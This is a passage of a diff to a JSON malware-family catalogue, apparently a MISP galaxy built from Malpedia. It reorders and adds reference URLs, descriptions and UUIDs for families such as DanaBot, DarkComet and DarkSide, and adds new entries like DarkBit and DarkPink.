"Rebhip"
],
"type": []
},
- "related": [
- {
- "dest-uuid": "f6e6540e-c21f-4202-ac46-185e735215db",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "062d8577-d6e6-4c97-bcac-eb6eb1a50a8d",
"value": "CyberGate"
},
@@ -19251,8 +20476,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.cyrat",
- "https://www.gdatasoftware.com/blog/cyrat-ransomware",
- "https://id-ransomware.blogspot.com/2020/08/cyrat-ransomware.html"
+ "https://id-ransomware.blogspot.com/2020/08/cyrat-ransomware.html",
+ "https://www.gdatasoftware.com/blog/cyrat-ransomware"
],
"synonyms": [],
"type": []
@@ -19278,13 +20503,14 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.dacls",
- "https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/",
- "https://blog.netlab.360.com/dacls-the-dual-platform-rat/",
- "https://securelist.com/mata-multi-platform-targeted-malware-framework/97746/",
- "https://www.sygnia.co/mata-framework",
+ "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
"https://securelist.com/apt-trends-report-q2-2020/97937/",
"https://malwareandstuff.com/peb-where-magic-is-stored/",
- "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf"
+ "https://blog.netlab.360.com/dacls-the-dual-platform-rat/",
+ "https://securelist.com/mata-multi-platform-targeted-malware-framework/97746/",
+ "https://blogs.vmware.com/security/2022/11/threat-analysis-active-c2-discovery-using-protocol-emulation-part4-dacls-aka-mata.html",
+ "https://www.sygnia.co/mata-framework",
+ "https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/"
],
"synonyms": [
"MATA"
@@ -19299,11 +20525,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.dadjoke",
+ "https://wemp.app/posts/80ab2b2d-4e0e-4960-94b7-4d452a06fd38?utm_source=latest-posts",
"https://prezi.com/view/jGyAzyy5dTOkDrtwsJi5/",
+ "https://twitter.com/a_tweeter_user/status/1154764787823316993",
"https://twitter.com/ClearskySec/status/1110941178231484417",
"https://www.youtube.com/watch?v=vx9IB88wXSE",
- "https://wemp.app/posts/80ab2b2d-4e0e-4960-94b7-4d452a06fd38?utm_source=latest-posts",
- "https://twitter.com/a_tweeter_user/status/1154764787823316993",
"https://medium.com/@Sebdraven/apt-40-in-malaysia-61ed9c9642e9"
],
"synonyms": [],
@@ -19318,11 +20544,11 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.dadstache",
"https://medium.com/insomniacs/dad-theres-a-rat-in-here-e3729b65bf7a",
+ "https://www.elastic.co/blog/advanced-techniques-used-in-malaysian-focused-apt-campaign",
"https://twitter.com/killamjr/status/1204584085395517440",
- "https://medium.com/insomniacs/apt40-goes-from-template-injections-to-ole-linkings-for-payload-delivery-99eb43170a97",
- "https://twitter.com/cyb3rops/status/1199978327697694720",
"https://danielplohmann.github.io/blog/2020/07/10/kf-sandbox-necromancy.html",
- "https://www.elastic.co/blog/advanced-techniques-used-in-malaysian-focused-apt-campaign"
+ "https://medium.com/insomniacs/apt40-goes-from-template-injections-to-ole-linkings-for-payload-delivery-99eb43170a97",
+ "https://twitter.com/cyb3rops/status/1199978327697694720"
],
"synonyms": [],
"type": []
@@ -19340,15 +20566,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "2a56538f-7c21-44b3-b438-5baa025ed005",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "92960f1f-5099-4e38-a177-14a5e3b8d601",
"value": "Dairy"
},
@@ -19357,45 +20574,47 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.danabot",
- "https://securelist.com/financial-cyberthreats-in-2020/101638/",
- "https://research.checkpoint.com/danabot-demands-a-ransom-payment/",
- "https://www.zscaler.com/blogs/security-research/spike-danabot-malware-activity",
- "https://www.cisa.gov/uscert/ncas/alerts/aa22-110a",
- "https://www.zscaler.com/blogs/security-research/danabot-launches-ddos-attack-against-ukrainian-ministry-defense",
- "https://news.sophos.com/en-us/2021/10/24/node-poisoning-hijacked-package-delivers-coin-miner-and-credential-stealing-backdoor",
- "https://security-soup.net/decoding-a-danabot-downloader/",
- "https://resources.malwarebytes.com/files/2020/05/CTNT_Q1_2020_COVID-Report_Final.pdf",
- "https://www.welivesecurity.com/2019/02/07/danabot-updated-new-cc-communication/",
- "https://www.proofpoint.com/us/blog/threat-insight/new-year-new-version-danabot",
- "https://blog.lexfo.fr/danabot-malware.html",
- "https://www.mandiant.com/resources/supply-chain-node-js",
- "https://www.proofpoint.com/us/threat-insight/post/danabot-gains-popularity-and-targets-us-organizations-large-campaigns",
- "https://twitter.com/f0wlsec/status/1459892481760411649",
- "https://www.proofpoint.com/us/threat-insight/post/danabot-new-banking-trojan-surfaces-down-under-0",
- "https://assets.virustotal.com/reports/2021trends.pdf",
- "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
- "https://blogs.blackberry.com/en/2021/11/threat-thursday-danabot-malware-as-a-service",
- "https://www.bitdefender.com/blog/hotforsecurity/popular-npm-repositories-compromised-in-man-in-the-middle-attack/",
- "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
- "https://www.fortinet.com/blog/threat-research/breakdown-of-a-targeted-danabot-attack.html",
- "https://www.welivesecurity.com/2018/09/21/danabot-targeting-europe-adds-new-features/",
- "https://www.lastline.com/labsblog/evolution-of-excel-4-0-macro-weaponization/",
"https://malverse.it/costruiamo-un-config-extractor-per-danabot-parte-1",
- "https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf",
+ "https://www.bitdefender.com/blog/hotforsecurity/popular-npm-repositories-compromised-in-man-in-the-middle-attack/",
+ "https://www.welivesecurity.com/2019/02/07/danabot-updated-new-cc-communication/",
"https://asert.arbornetworks.com/danabots-travels-a-global-perspective/",
- "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree",
+ "https://www.zscaler.com/blogs/security-research/danabot-launches-ddos-attack-against-ukrainian-ministry-defense",
+ "https://research.checkpoint.com/danabot-demands-a-ransom-payment/",
+ "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
+ "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
+ "https://www.mandiant.com/resources/supply-chain-node-js",
+ "https://www.proofpoint.com/us/threat-insight/post/danabot-new-banking-trojan-surfaces-down-under-0",
+ "https://www.cisa.gov/uscert/ncas/alerts/aa22-110a",
+ "https://malwareandstuff.com/deobfuscating-danabots-api-hashing/",
+ "https://www.fortinet.com/blog/threat-research/breakdown-of-a-targeted-danabot-attack.html",
"https://asec.ahnlab.com/en/30445/",
+ "https://www.zscaler.com/blogs/security-research/technical-analysis-danabot-obfuscation-techniques",
+ "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree",
+ "https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf",
+ "https://blog.lexfo.fr/danabot-malware.html",
+ "https://security-soup.net/decoding-a-danabot-downloader/",
+ "https://www.trustwave.com/Resources/SpiderLabs-Blog/DanaBot-Riding-Fake-MYOB-Invoice-Emails/",
+ "https://www.proofpoint.com/us/blog/threat-insight/new-year-new-version-danabot",
+ "https://www.welivesecurity.com/2018/09/21/danabot-targeting-europe-adds-new-features/",
+ "https://news.sophos.com/en-us/2021/10/24/node-poisoning-hijacked-package-delivers-coin-miner-and-credential-stealing-backdoor",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://resources.malwarebytes.com/files/2020/05/CTNT_Q1_2020_COVID-Report_Final.pdf",
+ "https://blogs.blackberry.com/en/2021/11/threat-thursday-danabot-malware-as-a-service",
+ "https://www.gdatasoftware.com/blog/2019/05/31695-strange-bits-smuggling-malware-github",
+ "https://www.lastline.com/labsblog/evolution-of-excel-4-0-macro-weaponization/",
"https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/",
"https://www.proofpoint.com/us/threat-insight/post/danabot-control-panel-revealed",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
- "https://www.welivesecurity.com/2018/12/06/danabot-evolves-beyond-banking-trojan-new-spam/",
- "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf",
- "https://www.gdatasoftware.com/blog/2019/05/31695-strange-bits-smuggling-malware-github",
- "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
+ "https://securelist.com/nullmixer-oodles-of-trojans-in-a-single-dropper/107498/",
"https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf",
+ "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
+ "https://securelist.com/financial-cyberthreats-in-2020/101638/",
+ "https://www.proofpoint.com/us/threat-insight/post/danabot-gains-popularity-and-targets-us-organizations-large-campaigns",
+ "https://www.zscaler.com/blogs/security-research/spike-danabot-malware-activity",
+ "https://www.welivesecurity.com/2018/12/06/danabot-evolves-beyond-banking-trojan-new-spam/",
"https://blog.yoroi.company/research/dissecting-the-danabot-paylaod-targeting-italy/",
- "https://www.trustwave.com/Resources/SpiderLabs-Blog/DanaBot-Riding-Fake-MYOB-Invoice-Emails/",
- "https://malwareandstuff.com/deobfuscating-danabots-api-hashing/",
+ "https://twitter.com/f0wlsec/status/1459892481760411649",
+ "https://assets.virustotal.com/reports/2021trends.pdf",
"https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/"
],
"synonyms": [],
@@ -19409,13 +20628,13 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.danbot",
- "https://cyberx-labs.com/blog/deep-dive-into-the-lyceum-danbot-malware/",
- "https://www.clearskysec.com/wp-content/uploads/2021/08/Siamesekitten.pdf",
"https://dragos.com/wp-content/uploads/Dragos-Oil-and-Gas-Threat-Perspective-2019.pdf",
"https://www.secureworks.com/research/threat-profiles/cobalt-lyceum",
- "https://www.youtube.com/watch?v=FttiysUZmDw",
+ "https://cyberx-labs.com/blog/deep-dive-into-the-lyceum-danbot-malware/",
+ "https://otx.alienvault.com/pulse/5d4301edb3f3406ac01acc0f",
+ "https://www.clearskysec.com/wp-content/uploads/2021/08/Siamesekitten.pdf",
"https://vblocalhost.com/uploads/VB2021-Kayal-etal.pdf",
- "https://otx.alienvault.com/pulse/5d4301edb3f3406ac01acc0f"
+ "https://www.youtube.com/watch?v=FttiysUZmDw"
],
"synonyms": [],
"type": []
@@ -19423,29 +20642,60 @@
"uuid": "98d3c6b3-c29f-46ba-b24d-88b135cd3183",
"value": "danbot"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkbit",
+ "https://blogs.blackberry.com/en/2023/02/darkbit-ransomware-targets-israel",
+ "https://github.com/albertzsigovits/malware-notes/blob/master/Ransomware-Windows-DarkBit/README.md",
+ "https://www.microsoft.com/en-us/security/blog/2023/04/07/mercury-and-dev-1084-destructive-attack-on-hybrid-environment/",
+ "https://twitter.com/luc4m/status/1626535098039271425",
+ "https://labs.k7computing.com/index.php/muddywater-back-with-darkbit/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "abf5436b-23e4-4dec-8c98-0e95a499be78",
+ "value": "DarkBit"
+ },
+ {
+ "description": "Stealer is written in Visual Basic.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkcloud",
+ "https://c3rb3ru5d3d53c.github.io/malware-blog/darkcloud-stealer/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "43601d72-1df5-4d95-8cdc-ad9754aa5d72",
+ "value": "DarkCloud Stealer"
+ },
{
"description": "DarkComet is one of the most famous RATs, developed by Jean-Pierre Lesueur in 2008. After being used in the Syrian civil war in 2011, Lesuer decided to stop developing the trojan. Indeed, DarkComet is able to enable control over a compromised system through use of a simple graphic user interface. Experts think that this user friendliness is the key of its mass success.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.darkcomet",
- "https://github.com/threatland/TL-TROJAN/tree/master/TL.RAT/RAT.Win.DarkComet",
- "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/how-cybercriminals-abuse-cloud-tunneling-services",
+ "https://blog.talosintelligence.com/2022/06/avoslocker-new-arsenal.html",
"https://blog.malwarebytes.com/threat-analysis/2012/06/you-dirty-rat-part-1-darkcomet/",
- "https://blog.malwarebytes.com/threat-analysis/2012/10/dark-comet-2-electric-boogaloo/",
- "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf",
- "https://content.fireeye.com/apt/rpt-apt38",
- "https://www.secureworks.com/research/threat-profiles/copper-fieldstone",
- "https://www.sentinelone.com/wp-content/uploads/2022/02/Modified-Elephant-APT-and-a-Decade-of-Fabricating-Evidence-SentinelLabs.pdf",
- "https://blog.talosintelligence.com/2022/02/threat-roundup-0204-0211.html",
+ "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage",
+ "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/how-cybercriminals-abuse-cloud-tunneling-services",
"https://www.sentinelone.com/labs/modifiedelephant-apt-and-a-decade-of-fabricating-evidence/",
"https://www.fireeye.com/blog/threat-research/2016/06/apt_group_sends_spea.html",
+ "https://content.fireeye.com/apt/rpt-apt38",
"http://contagiodump.blogspot.com/2012/06/rat-samples-from-syrian-targeted.html",
+ "https://github.com/threatland/TL-TROJAN/tree/master/TL.RAT/RAT.Win.DarkComet",
+ "https://www.secureworks.com/research/threat-profiles/copper-fieldstone",
+ "https://blog.talosintelligence.com/2022/02/threat-roundup-0204-0211.html",
"https://www.secureworks.com/research/threat-profiles/aluminum-saratoga",
- "https://blog.talosintelligence.com/2022/06/avoslocker-new-arsenal.html",
- "https://www.tgsoft.it/files/report/download.asp?id=7481257469",
- "https://www.sysnet.ucsd.edu/sysnet/miscpapers/darkmatter-www20.pdf",
- "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage",
+ "https://blog.malwarebytes.com/threat-analysis/2012/10/dark-comet-2-electric-boogaloo/",
+ "https://www.sentinelone.com/wp-content/uploads/2022/02/Modified-Elephant-APT-and-a-Decade-of-Fabricating-Evidence-SentinelLabs.pdf",
+ "https://businessinsights.bitdefender.com/tech-advisory-manageengine-cve-2022-47966",
"https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage",
+ "https://www.sysnet.ucsd.edu/sysnet/miscpapers/darkmatter-www20.pdf",
+ "https://www.tgsoft.it/files/report/download.asp?id=7481257469",
+ "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf",
"https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/"
],
"synonyms": [
@@ -19455,18 +20705,23 @@
],
"type": []
},
- "related": [
- {
- "dest-uuid": "15949ecb-1f2b-4f59-9cf7-5751694e8fba",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "5086a6e0-53b2-4d96-9eb3-a0237da2e591",
"value": "DarkComet"
},
+ {
+ "description": "Mandiant associates this with UNC4191, this malware spreads to removable drives.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkdew",
+ "https://www.mandiant.com/resources/blog/china-nexus-espionage-southeast-asia",
+ "https://news.sophos.com/en-us/2022/11/03/family-tree-dll-sideloading-cases-may-be-related/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "16d9f98d-4da6-419d-89f7-8c30418255ae",
+ "value": "DARKDEW"
+ },
{
"description": "",
"meta": {
@@ -19524,8 +20779,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.darkmegi",
- "http://contagiodump.blogspot.com/2012/04/this-is-darkmegie-rootkit-sample-kindly.html",
- "http://stopmalvertising.com/rootkits/analysis-of-darkmegi-aka-npcdark.html"
+ "http://stopmalvertising.com/rootkits/analysis-of-darkmegi-aka-npcdark.html",
+ "http://contagiodump.blogspot.com/2012/04/this-is-darkmegie-rootkit-sample-kindly.html"
],
"synonyms": [],
"type": []
@@ -19538,8 +20793,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.darkmoon",
- "http://contagiodump.blogspot.com/2010/01/jan-17-trojan-darkmoonb-exe-haiti.html",
"https://www.f-secure.com/v-descs/trojan-downloader_w32_chymine_a.shtml",
+ "http://contagiodump.blogspot.com/2010/01/jan-17-trojan-darkmoonb-exe-haiti.html",
"http://contagiodump.blogspot.com/2010/07/cve-2010-2568-keylogger-win32chyminea.html"
],
"synonyms": [
@@ -19550,6 +20805,19 @@
"uuid": "81ca4876-b4a4-43e9-b8a9-8a88709dd3d2",
"value": "Darkmoon"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkpink",
+ "https://www.group-ib.com/media-center/press-releases/dark-pink-apt/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "f3522624-a704-4d74-8c21-1c863ab6d5eb",
+ "value": "DarkPink"
+ },
{
"description": "",
"meta": {
@@ -19560,15 +20828,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "7e9f46aa-d5d1-11e8-b782-e71d52d8ac7c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "1aecd6eb-80e2-4598-8504-d93f69c7a8f0",
"value": "DarkPulsar"
},
@@ -19583,15 +20842,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "c9e6e42a-65c0-418e-ab77-09bcdb1214a3",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "bcff979f-2b4b-41cc-86c9-fe1ea3adce6e",
"value": "DarkRat"
},
@@ -19614,129 +20864,130 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.darkside",
- "https://www.crowdstrike.com/blog/falcon-protects-from-darkside-ransomware/",
- "https://www.metabaseq.com/recursos/inside-darkside-the-ransomware-that-attacked-colonial-pipeline#",
- "https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html",
- "https://zawadidone.nl/2020/10/05/darkside-ransomware-analysis.html",
- "https://www.dragos.com/blog/industry-news/recommendations-following-the-colonial-pipeline-cyber-attack/",
- "https://www.technologyreview.com/2021/05/24/1025195/colonial-pipeline-ransomware-bitdefender/",
- "https://www.crowdstrike.com/blog/how-ransomware-adversaries-reacted-to-the-darkside-pipeline-attack/",
- "https://www.secjuice.com/blue-team-detection-darkside-ransomware/",
- "https://www.microsoft.com/security/blog/2022/04/13/dismantling-zloader-how-malicious-ads-led-to-disabled-security-tools-and-ransomware/",
- "https://www.bleepingcomputer.com/news/security/popular-russian-hacking-forum-xss-bans-all-ransomware-topics/",
- "https://www.nozominetworks.com/blog/colonial-pipeline-ransomware-attack-revealing-how-darkside-works/",
- "https://www.crowdstrike.com/blog/how-to-defend-against-conti-darkside-revil-and-other-ransomware/",
- "https://www.ic3.gov/Media/News/2021/211101.pdf",
- "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound",
- "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/",
- "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
- "https://www.repubblica.it/economia/finanza/2021/04/28/news/un_sospetto_attacco_telematico_blocca_le_filiali_della_bcc_di_roma-298485827/",
- "https://www.elliptic.co/blog/darkside-ransomware-has-netted-over-90-million-in-bitcoin",
- "http://chuongdong.com/reverse%20engineering/2021/05/06/DarksideRansomware/",
- "https://www.secureworks.com/research/threat-profiles/gold-waterfall",
- "https://www.youtube.com/watch?v=NIiEcOryLpI",
- "https://id-ransomware.blogspot.com/2020/08/darkside-ransomware.html",
- "https://brandefense.io/darkside-ransomware-analysis-report/",
- "https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
- "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-as-a-service-enabler-of-widespread-attacks",
+ "https://chuongdong.com/reverse%20engineering/2021/05/06/DarksideRansomware/",
"https://www.varonis.com/blog/darkside-ransomware/",
- "https://www.intel471.com/blog/darkside-ransomware-colonial-pipeline-attack",
- "https://www.digitalshadows.com/blog-and-research/ransomware-as-a-service-rogue-affiliates-and-whats-next/",
- "https://blog.360totalsecurity.com/en/darksides-targeted-ransomware-analysis-report-for-critical-u-s-infrastructure-2/",
- "https://www.digitalshadows.com/blog-and-research/darkside-the-new-ransomware-group-behind-highly-targeted-attacks/",
- "https://www.fortinet.com/blog/threat-research/newly-discovered-function-in-darkside-ransomware-variant-targets-disk-partitions",
"https://www.advanced-intel.com/post/from-dawn-to-silent-night-darkside-ransomware-initial-attack-vector-evolution",
- "https://www.bleepingcomputer.com/news/security/darkside-ransomware-gang-returns-as-new-blackmatter-operation/",
- "https://threatpost.com/guess-fashion-data-loss-ransomware/167754/",
- "https://www.hhs.gov/sites/default/files/demystifying-blackmatter.pdf",
- "https://zawadidone.nl/darkside-ransomware-analysis/",
- "https://symantec.broadcom.com/hubfs/Attacks-Against-Critical_Infrastructrure.pdf",
- "https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/",
- "https://www.reuters.com/technology/colonial-pipeline-halts-all-pipeline-operations-after-cybersecurity-attack-2021-05-08/",
- "https://therecord.media/popular-hacking-forum-bans-ransomware-ads/",
- "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
- "https://www.bleepingcomputer.com/news/security/us-chemical-distributor-shares-info-on-darkside-ransomware-data-theft/",
- "https://www.acronis.com/en-us/articles/darkside-ransomware/",
- "https://unit42.paloaltonetworks.com/darkside-ransomware/",
- "https://www.trendmicro.com/en_us/research/21/e/what-we-know-about-darkside-ransomware-and-the-us-pipeline-attac.html",
- "https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf",
- "https://www.bleepingcomputer.com/news/security/darkside-ransomware-is-creating-a-secure-data-leak-service-in-iran/",
- "https://cybergeeks.tech/a-step-by-step-analysis-of-a-new-version-of-darkside-ransomware/",
- "https://therecord.media/darkside-ransomware-gang-moves-some-of-its-bitcoin-after-revil-got-hit-by-law-enforcement/",
"https://www.flashpoint-intel.com/blog/darkside-ransomware-links-to-revil-difficult-to-dismiss/",
- "https://www.intel471.com/blog/darkside-ransomware-shut-down-revil-avaddon-cybercrime",
- "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/",
- "https://blueteamblog.com/darkside-ransomware-operations-preventions-and-detections",
- "https://twitter.com/GelosSnake/status/1451465959894667275",
- "https://www.bleepingcomputer.com/news/security/chemical-distributor-pays-44-million-to-darkside-ransomware/",
- "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
- "https://community.riskiq.com/article/fdf74f23",
- "https://twitter.com/sysopfb/status/1422280887274639375",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
- "https://www.cybereason.com/blog/cybereason-vs-darkside-ransomware",
- "https://www.bloomberg.com/news/articles/2021-05-13/colonial-pipeline-paid-hackers-nearly-5-million-in-ransom",
- "https://therecord.media/darkside-gang-estimated-to-have-made-over-90-million-from-ransomware-attacks/",
- "https://www.deepinstinct.com/2021/06/04/the-ransomware-conundrum-a-look-into-darkside/",
- "https://therecord.media/an-interview-with-blackmatter-a-new-ransomware-group-thats-learning-from-the-mistakes-of-darkside-and-revil/",
- "https://blog.group-ib.com/blackmatter2",
+ "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/",
+ "https://www.intel471.com/blog/darkside-ransomware-colonial-pipeline-attack",
+ "https://www.technologyreview.com/2021/05/24/1025195/colonial-pipeline-ransomware-bitdefender/",
+ "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/",
+ "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound",
+ "https://www.secjuice.com/blue-team-detection-darkside-ransomware/",
"https://blog.cyble.com/2021/08/05/blackmatter-under-the-lens-an-emerging-ransomware-group-looking-for-affiliates/",
- "https://id-ransomware.blogspot.com/2021/07/blackmatter-ransomware.html",
- "https://www.wsj.com/articles/colonial-pipeline-ceo-tells-why-he-paid-hackers-a-4-4-million-ransom-11621435636",
- "https://news.sophos.com/en-us/2021/05/11/a-defenders-view-inside-a-darkside-ransomware-attack/",
- "https://www.bleepingcomputer.com/news/security/blackmatter-ransomware-gang-rises-from-the-ashes-of-darkside-revil/",
- "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/",
+ "https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox",
+ "https://www.nozominetworks.com/blog/colonial-pipeline-ransomware-attack-revealing-how-darkside-works/",
+ "https://www.bleepingcomputer.com/news/security/us-chemical-distributor-shares-info-on-darkside-ransomware-data-theft/",
+ "https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/",
+ "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-as-a-service-enabler-of-widespread-attacks",
+ "https://www.sentinelone.com/blog/meet-darkside-and-their-ransomware-sentinelone-customers-protected/",
+ "https://www.secureworks.com/research/threat-profiles/gold-waterfall",
+ "https://www.maltego.com/blog/chasing-darkside-affiliates-identifying-threat-actors-connected-to-darkside-ransomware-using-maltego-intel-471-1/",
+ "https://unit42.paloaltonetworks.com/darkside-ransomware/",
"https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/",
- "https://www.glimps.fr/lockbit3-0/",
- "https://blogs.keysight.com/blogs/tech/nwvs.entry.html/2021/05/18/darkside_ransomware-QfsV.html",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://www.crowdstrike.com/blog/falcon-protects-from-darkside-ransomware/",
"https://blog.gigamon.com/2021/05/17/tracking-darkside-and-ransomware-the-network-view/",
- "https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/",
+ "https://news.sophos.com/en-us/2021/05/11/a-defenders-view-inside-a-darkside-ransomware-attack/",
+ "https://www.bleepingcomputer.com/news/security/darkside-affiliates-claim-gangs-bitcoins-in-deposit-on-hacker-forum/",
+ "https://github.com/Haxrein/Malware-Analysis-Reports/blob/main/darkside_ransomware_technical_analysis_report.pdf",
+ "https://labs.bitdefender.com/2021/01/darkside-ransomware-decryption-tool/",
+ "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
"http://ti.dbappsecurity.com.cn/blog/index.php/2021/05/10/darkside/",
+ "https://www.bleepingcomputer.com/news/security/popular-russian-hacking-forum-xss-bans-all-ransomware-topics/",
+ "https://socprime.com/blog/affiliates-vs-hunters-fighting-the-darkside/",
+ "https://therecord.media/ransomware-gang-wants-to-short-the-stock-price-of-their-victims/",
+ "https://www.intel471.com/blog/darkside-ransomware-shut-down-revil-avaddon-cybercrime",
+ "https://therecord.media/darkside-gang-estimated-to-have-made-over-90-million-from-ransomware-attacks/",
+ "https://securityintelligence.com/posts/darkside-oil-pipeline-ransomware-attack/",
+ "https://www.hhs.gov/sites/default/files/demystifying-blackmatter.pdf",
+ "https://www.repubblica.it/economia/finanza/2021/04/28/news/un_sospetto_attacco_telematico_blocca_le_filiali_della_bcc_di_roma-298485827/",
+ "https://www.digitalshadows.com/blog-and-research/ransomware-as-a-service-rogue-affiliates-and-whats-next/",
+ "https://www.elliptic.co/blog/darkside-ransomware-has-netted-over-90-million-in-bitcoin",
+ "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
+ "https://zawadidone.nl/darkside-ransomware-analysis/",
+ "https://asec.ahnlab.com/en/34549/",
+ "https://id-ransomware.blogspot.com/2020/08/darkside-ransomware.html",
+ "https://www.deepinstinct.com/2021/06/04/the-ransomware-conundrum-a-look-into-darkside/",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
+ "https://www.acronis.com/en-us/articles/darkside-ransomware/",
+ "https://www.dragos.com/blog/industry-news/recommendations-following-the-colonial-pipeline-cyber-attack/",
